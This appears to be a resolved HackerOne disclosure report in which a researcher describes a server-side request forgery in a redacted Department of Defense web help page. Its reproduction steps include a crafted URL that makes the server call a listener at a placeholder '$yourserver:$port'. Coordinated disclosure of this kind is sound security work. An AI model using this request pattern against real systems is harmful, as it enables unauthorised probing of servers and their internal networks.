Server-Side Request Forgery (SSRF)

Disclosed: 2019-12-02 19:09:40 By t-pwn To deptofdefense
Medium
Vulnerability Details
Hi, I've found a Server-Side Request Forgery (SSRF) Steps to reproduce: + start listening on your server + navigate to http://██████/help/ACPS.htm#http://$yourserver:$port + you will get the request ██████ ## Impact Server-Side Request Forgery (SSRF) Attack
Actions
View on HackerOne
Report Stats
  • Report ID: 382048
  • State: Closed
  • Substate: resolved
  • Upvotes: 9
Share this report